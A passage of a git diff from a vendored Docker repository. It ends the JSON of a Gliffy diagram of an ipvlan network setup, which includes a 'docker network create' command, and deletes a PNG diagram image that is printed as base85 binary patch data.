style=\"\">192.168.1.3/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":102.0,"y":130.1999969482422,"rotation":0.0,"id":130,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">pub_net (eth0)</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":93.0,"y":92.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"text-decoration:none;font-family:Arial;font-size:12px;\"><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":14.0,"y":114.19999694824219,"rotation":0.0,"id":142,"width":78.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">Docker Host</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":235.5,"rotation":0.0,"id":184,"width":196.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:left;\"><span style=\"\">docker network create -d ipvlan \\</span></p><p style=\"text-align:left;\"><span style=\"\">&nbsp; &nbsp; --subnet&#61;192.168.1.0/24 \\</span></p><p style=\"text-align:left;\"><span style=\"\">&nbsp; &nbsp; --gateway&#61;192.168.1.1 \\</span></p><p style=\"text-align:left;\"><span style=\"\">&nbsp; &nbsp; -o parent&#61;eth0 pub_net</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":45}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#999999","strokeWidth":6,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457584497063,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png
deleted file mode 100644
index e489a446ddd255ce9360445f0f895acad31ae214..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 20145
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
